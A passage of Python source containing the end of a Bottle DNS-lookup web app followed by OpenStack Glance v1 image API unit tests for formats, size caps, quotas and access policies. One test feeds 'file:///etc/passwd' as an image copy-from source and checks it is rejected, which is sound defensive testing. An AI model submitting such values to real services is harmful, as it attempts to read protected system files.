loadRecord(record, type=\'A\', ext=\'html\'):\n\ttry:\n\t\tif record == """":\n\t\t\traise ValueError\n\t\tif not ext in [""html"",""txt"", ""text"", ""json""]:\n\t\t\traise ValueError\n\t\tif not type.upper() in args.records.split(\',\'):\n\t\t\traise ValueError\n\texcept ValueError:\n\t\treturn returnError(404, ""Not Found"", ""text/html"")\n\n\tif ext in [""json""]:\n\t\tresponse.content_type = \'application/json\'\n\tif ext in [""txt"", ""text""]:\n\t\tresponse.content_type = \'text/plain\'\n\n\t# We make a request to get information\n\tdata = resolveDomain(record, type.upper(), args)\n\n\tif response.content_type == \'application/json\':\n\t\treturn json.dumps({\n\t\t\t\'results\': {\n\t\t\t\t\'name\': record,\n\t\t\t\t\'type\': type.upper(),\n\t\t\t\t\'records\': data,\n\t\t\t}\n\t\t})\n\telif response.content_type == ""text/plain"":\n\t\treturn ""\\r\\n"".join(data)\n\telse:\n\t\treturn template(\'rec\', {\n\t\t\t\'name\': record,\n\t\t\t\'type\': type.upper(),\n\t\t\t\'records\': data,\n\t\t\t\'recTypes\': args.records.split(\',\')\n\t\t})\n\n@route(\'/\', (\'GET\', \'POST\'))\ndef index():\n\n\tif request.method == ""POST"":\n\t\trecordName = request.forms.get(\'recordName\', \'\')\n\t\trecordType = request.forms.get(\'recordType\', \'\')\n\n\t\tif recordName != \'\' and recordType in args.records.split(\',\'):\n\t\t\treturn redirect(""/{}/{}"".format(recordName, recordType))\n\t\telse:\n\t\t\treturn returnError(404, ""We were not able to figure out what you were asking for"", ""text/html"")\n\n\treturn template(""home"", {\n\t\t\'recTypes\': args.records.split(\',\')\n\t})\n\nif __name__ == \'__main__\':\n\n\tparser = argparse.ArgumentParser()\n\n\t# Server settings\n\tparser.add_argument(""-i"", ""--host"", default=os.getenv(\'HOST\', \'127.0.0.1\'), help=""server ip"")\n\tparser.add_argument(""-p"", ""--port"", default=os.getenv(\'PORT\', 5000), help=""server port"")\n\n\t# Redis settings\n\tparser.add_argument(""--redis"", default=os.getenv(\'REDIS\', \'redis://localhost:6379/0\'), help=""redis connection string"")\n\n\t# Application settings\n\tparser.add_argument(""--doh"", help=""use DNS-over-HTTPS and treat --resolver as DNS-over-HTTPS capable (beta)"", action=""store_true"")\n\tparser.add_argument(""--records"", default=os.getenv(\'RECORDS\', ""A,AAAA,CAA,CNAME,DS,DNSKEY,MX,NS,NSEC,NSEC3,RRSIG,SOA,TXT""), help=""supported records"")\n\tparser.add_argument(""--resolver"", default=os.getenv(\'RESOLVER\', \'127.0.0.1\'), help=""resolver address"")\n\n\t# Verbose mode\n\tparser.add_argument(""--verbose"", ""-v"", help=""increase output verbosity"", action=""store_true"")\n\targs = parser.parse_args()\n\n\tif args.verbose:\n\t\tlogging.basicConfig(level=logging.DEBUG)\n\telse:\n\t\tlogging.basicConfig(level=logging.INFO)\n\tlog = logging.getLogger(__name__)\n\n\ttry:\n\t\tapp = default_app()\n\t\tapp.run(host=args.host, port=args.port, server=\'tornado\')\n\texcept:\n\t\tlog.error(""Unable to start server on {}:{}"".format(args.host, args.port))', '# vim: tabstop=4 shiftwidth=4 softtabstop=4\n# -*- coding: utf-8 -*-\n\n# Copyright 2010-2011 OpenStack, LLC\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License""); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport datetime\nimport hashlib\nimport json\nimport StringIO\n\nfrom oslo.config import cfg\nimport routes\nimport six\nimport webob\n\nimport glance.api\nimport glance.api.common\nfrom glance.api.v1 import filters\nfrom glance.api.v1 import images\nfrom glance.api.v1 import router\nfrom glance.common import exception\nimport glance.common.config\nimport glance.context\nfrom glance.db.sqlalchemy import api as db_api\nfrom glance.db.sqlalchemy import models as db_models\nfrom glance.openstack.common import timeutils\nfrom glance.openstack.common import uuidutils\nimport glance.store.filesystem\nfrom glance.tests.unit import base\nfrom glance.tests import utils as test_utils\nimport glance.tests.unit.utils as unit_test_utils\n\nCONF = cfg.CONF\n\n_gen_uuid = uuidutils.generate_uuid\n\nUUID1 = _gen_uuid()\nUUID2 = _gen_uuid()\n\n\nclass TestGlanceAPI(base.IsolatedUnitTest):\n def setUp(self):\n """"""Establish a clean test environment""""""\n super(TestGlanceAPI, self).setUp()\n self.mapper = routes.Mapper()\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))\n self.FIXTURES = [\n {\'id\': UUID1,\n \'name\': \'fake image #1\',\n \'status\': \'active\',\n \'disk_format\': \'ami\',\n \'container_format\': \'ami\',\n \'is_public\': False,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': None,\n \'size\': 13,\n \'locations\': [{\'url\': ""file:///%s/%s"" % (self.test_dir, UUID1),\n \'metadata\': {}}],\n \'properties\': {\'type\': \'kernel\'}},\n {\'id\': UUID2,\n \'name\': \'fake image #2\',\n \'status\': \'active\',\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'is_public\': True,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': \'abc123\',\n \'size\': 19,\n \'locations\': [{\'url\': ""file:///%s/%s"" % (self.test_dir, UUID2),\n \'metadata\': {}}],\n \'properties\': {}}]\n self.context = glance.context.RequestContext(is_admin=True)\n db_api.setup_db_env()\n db_api.get_engine()\n self.destroy_fixtures()\n self.create_fixtures()\n\n def tearDown(self):\n """"""Clear the test environment""""""\n super(TestGlanceAPI, self).tearDown()\n self.destroy_fixtures()\n\n def create_fixtures(self):\n for fixture in self.FIXTURES:\n db_api.image_create(self.context, fixture)\n # We write a fake image file to the filesystem\n with open(""%s/%s"" % (self.test_dir, fixture[\'id\']), \'wb\') as image:\n image.write(""chunk00000remainder"")\n image.flush()\n\n def destroy_fixtures(self):\n # Easiest to just drop the models and re-create them...\n db_models.unregister_models(db_api._ENGINE)\n db_models.register_models(db_api._ENGINE)\n\n def _do_test_defaulted_format(self, format_key, format_value):\n fixture_headers = {\'x-image-meta-name\': \'defaulted\',\n \'x-image-meta-location\': \'http://localhost:0/image\',\n format_key: format_value}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(format_value, res_body[\'disk_format\'])\n self.assertEquals(format_value, res_body[\'container_format\'])\n\n def test_defaulted_amazon_format(self):\n for key in (\'x-image-meta-disk-format\',\n \'x-image-meta-container-format\'):\n for value in (\'aki\', \'ari\', \'ami\'):\n self._do_test_defaulted_format(key, value)\n\n def test_bad_disk_format(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'invalid\',\n \'x-image-meta-container-format\': \'ami\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid disk format\' in res.body, res.body)\n\n def test_configured_disk_format_good(self):\n self.config(disk_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'foo\',\n \'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_configured_disk_format_bad(self):\n self.config(disk_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'bar\',\n \'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid disk format\' in res.body, res.body)\n\n def test_configured_container_format_good(self):\n self.config(container_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'raw\',\n \'x-image-meta-container-format\': \'foo\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_configured_container_format_bad(self):\n self.config(container_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'raw\',\n \'x-image-meta-container-format\': \'bar\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid container format\' in res.body, res.body)\n\n def test_container_and_disk_amazon_format_differs(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'aki\',\n \'x-image-meta-container-format\': \'ami\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n expected = (""Invalid mix of disk and container formats. ""\n ""When setting a disk or container format to one of ""\n ""\'aki\', \'ari\', or \'ami\', ""\n ""the container and disk formats must match."")\n self.assertEquals(res.status_int, 400)\n self.assertTrue(expected in res.body, res.body)\n\n def test_create_with_location_no_container_format(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid container format\' in res.body)\n\n def test_bad_container_format(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'invalid\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid container format\' in res.body)\n\n def test_bad_image_size(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://example.com/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-size\': \'invalid\',\n \'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Incoming image size\' in res.body)\n\n def test_bad_image_name(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'X\' * 256,\n \'x-image-meta-location\': \'http://example.com/image.tar.gz\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_no_location_no_image_as_body(self):\n """"""Tests creates a queued image for no body and no loc header""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'queued\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n # Test that we are able to edit the Location field\n # per LP Bug #911599\n\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-location\'] = \'http://localhost:0/images/123\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n res_body = json.loads(res.body)[\'image\']\n # Once the location is set, the image should be activated\n # see LP Bug #939484\n self.assertEquals(\'active\', res_body[\'status\'])\n self.assertFalse(\'location\' in res_body) # location never shown\n\n def test_add_image_no_location_no_content_type(self):\n """"""Tests creates a queued image for no body and no loc header""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.body = ""chunk00000remainder""\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_size_header_too_big(self):\n """"""Tests raises BadRequest for supplied image size that is too big""""""\n fixture_headers = {\'x-image-meta-size\': CONF.image_size_cap + 1,\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_size_chunked_data_too_big(self):\n self.config(image_size_cap=512)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'ami\',\n \'x-image-meta-disk_format\': \'ami\',\n \'transfer-encoding\': \'chunked\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n\n req.body_file = StringIO.StringIO(\'X\' * (CONF.image_size_cap + 1))\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_add_image_size_data_too_big(self):\n self.config(image_size_cap=512)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'ami\',\n \'x-image-meta-disk_format\': \'ami\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n\n req.body = \'X\' * (CONF.image_size_cap + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_size_header_exceed_quota(self):\n quota = 500\n self.config(user_storage_quota=quota)\n fixture_headers = {\'x-image-meta-size\': quota + 1,\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'bare\',\n \'x-image-meta-disk_format\': \'qcow2\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n req.body = \'X\' * (quota + 1)\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_add_image_size_data_exceed_quota(self):\n quota = 500\n self.config(user_storage_quota=quota)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'bare\',\n \'x-image-meta-disk_format\': \'qcow2\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n\n req.body = \'X\' * (quota + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n def test_add_image_size_data_exceed_quota_readd(self):\n quota = 500\n self.config(user_storage_quota=quota)\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n \'x-image-meta-container_format\': \'bare\',\n \'x-image-meta-disk_format\': \'qcow2\',\n \'content-type\': \'application/octet-stream\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.body = \'X\' * (quota + 1)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 413)\n\n used_size = sum([f[\'size\'] for f in self.FIXTURES])\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n req.body = \'X\' * (quota - used_size)\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def _add_check_no_url_info(self):\n\n fixture_headers = {\'x-image-meta-disk-format\': \'ami\',\n \'x-image-meta-container-format\': \'ami\',\n \'x-image-meta-size\': \'0\',\n \'x-image-meta-name\': \'empty image\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n res_body = json.loads(res.body)[\'image\']\n self.assertFalse(\'locations\' in res_body)\n self.assertFalse(\'direct_url\' in res_body)\n image_id = res_body[\'id\']\n\n # HEAD empty image\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertFalse(\'x-image-meta-locations\' in res.headers)\n self.assertFalse(\'x-image-meta-direct_url\' in res.headers)\n\n def test_add_check_no_url_info_ml(self):\n self.config(show_multiple_locations=True)\n self._add_check_no_url_info()\n\n def test_add_check_no_url_info_direct_url(self):\n self.config(show_image_direct_url=True)\n self._add_check_no_url_info()\n\n def test_add_check_no_url_info_both_on(self):\n self.config(show_image_direct_url=True)\n self.config(show_multiple_locations=True)\n self._add_check_no_url_info()\n\n def test_add_check_no_url_info_both_off(self):\n self._add_check_no_url_info()\n\n def test_add_image_zero_size(self):\n """"""Tests creating an active image with explicitly zero size""""""\n fixture_headers = {\'x-image-meta-disk-format\': \'ami\',\n \'x-image-meta-container-format\': \'ami\',\n \'x-image-meta-size\': \'0\',\n \'x-image-meta-name\': \'empty image\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(\'active\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n # GET empty image\n req = webob.Request.blank(""/images/%s"" % image_id)\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 200)\n self.assertEqual(len(res.body), 0)\n\n def _do_test_add_image_attribute_mismatch(self, attributes):\n fixture_headers = {\n \'x-image-meta-name\': \'fake image #3\',\n }\n fixture_headers.update(attributes)\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""XXXX""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_checksum_mismatch(self):\n attributes = {\n \'x-image-meta-checksum\': \'asdf\',\n }\n self._do_test_add_image_attribute_mismatch(attributes)\n\n def test_add_image_size_mismatch(self):\n attributes = {\n \'x-image-meta-size\': str(len(""XXXX"") + 1),\n }\n self._do_test_add_image_attribute_mismatch(attributes)\n\n def test_add_image_checksum_and_size_mismatch(self):\n attributes = {\n \'x-image-meta-checksum\': \'asdf\',\n \'x-image-meta-size\': str(len(""XXXX"") + 1),\n }\n self._do_test_add_image_attribute_mismatch(attributes)\n\n def test_add_image_bad_store(self):\n """"""Tests raises BadRequest for invalid store header""""""\n fixture_headers = {\'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_basic_file_store(self):\n """"""Tests to add a basic image in the file store""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n # Test that the Location: header is set to the URI to\n # edit the newly-created image, as required by APP.\n # See LP Bug #719825\n self.assertTrue(\'location\' in res.headers,\n ""\'location\' not in response headers.\\n""\n ""res.headerlist = %r"" % res.headerlist)\n res_body = json.loads(res.body)[\'image\']\n self.assertTrue(\'/images/%s\' % res_body[\'id\']\n in res.headers[\'location\'])\n self.assertEquals(\'active\', res_body[\'status\'])\n image_id = res_body[\'id\']\n\n # Test that we are NOT able to edit the Location field\n # per LP Bug #911599\n\n req = webob.Request.blank(""/images/%s"" % image_id)\n req.method = \'PUT\'\n req.headers[\'x-image-meta-location\'] = \'http://example.com/images/123\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_image_unauthorized(self):\n rules = {""add_image"": \'!\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_add_publicize_image_unauthorized(self):\n rules = {""add_image"": \'@\', ""modify_image"": \'@\',\n ""publicize_image"": \'!\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-is-public\': \'true\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_add_publicize_image_authorized(self):\n rules = {""add_image"": \'@\', ""modify_image"": \'@\',\n ""publicize_image"": \'@\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-is-public\': \'true\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_add_copy_from_image_unauthorized(self):\n rules = {""add_image"": \'@\', ""copy_from"": \'!\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://glance.com/i.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n\n def test_add_copy_from_image_authorized(self):\n rules = {""add_image"": \'@\', ""copy_from"": \'@\'}\n self.set_policy_rules(rules)\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://glance.com/i.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_add_copy_from_with_nonempty_body(self):\n """"""Tests creates an image from copy-from and nonempty body""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://a/b/c.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = webob.Request.blank(""/images"")\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.method = \'POST\'\n req.body = ""chunk00000remainder""\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_location_with_nonempty_body(self):\n """"""Tests creates an image from location and nonempty body""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-location\': \'http://a/b/c.tar.gz\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n req = webob.Request.blank(""/images"")\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.method = \'POST\'\n req.body = ""chunk00000remainder""\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_add_location_with_conflict_image_size(self):\n """"""Tests creates an image from location and conflict image size""""""\n\n self.stubs.Set(glance.api.v1.images, \'get_size_from_backend\',\n lambda *args, **kwargs: 2)\n\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-location\': \'http://a/b/c.tar.gz\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\',\n \'x-image-meta-size\': \'1\'}\n\n req = webob.Request.blank(""/images"")\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 409)\n\n def test_add_copy_from_with_location(self):\n """"""Tests creates an image from copy-from and location""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-glance-api-copy-from\': \'http://a/b/c.ovf\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\',\n \'x-image-meta-location\': \'http://a/b/c.tar.gz\'}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def _do_test_post_image_content_missing_format(self, missing):\n """"""Tests creation of an image with missing format""""""\n fixture_headers = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #3\'}\n\n header = \'x-image-meta-\' + missing.replace(\'_\', \'-\')\n\n del fixture_headers[header]\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n req.headers[\'Content-Type\'] = \'application/octet-stream\'\n req.body = ""chunk00000remainder""\n res = req.get_response(self.api)\n self.assertEqual(res.status_int, 400)\n\n def test_add_copy_from_with_restricted_sources(self):\n """"""Tests creates an image from copy-from with restricted sources""""""\n header_template = {\'x-image-meta-store\': \'file\',\n \'x-image-meta-disk-format\': \'vhd\',\n \'x-image-meta-container-format\': \'ovf\',\n \'x-image-meta-name\': \'fake image #F\'}\n\n schemas = [""file:///etc/passwd"",\n ""swift+config:///xxx"",\n ""filesystem:///etc/passwd""]\n\n for schema in schemas:\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in six.iteritems(header_template):\n req.headers[k] = v\n req.headers[\'x-glance-api-copy-from\'] = schema\n res = req.get_response(self.api)\n self.assertEqual(400, res.status_int)\n\n def test_post_image_content_missing_disk_format(self):\n """"""Tests creation of an image with missing disk format""""""\n 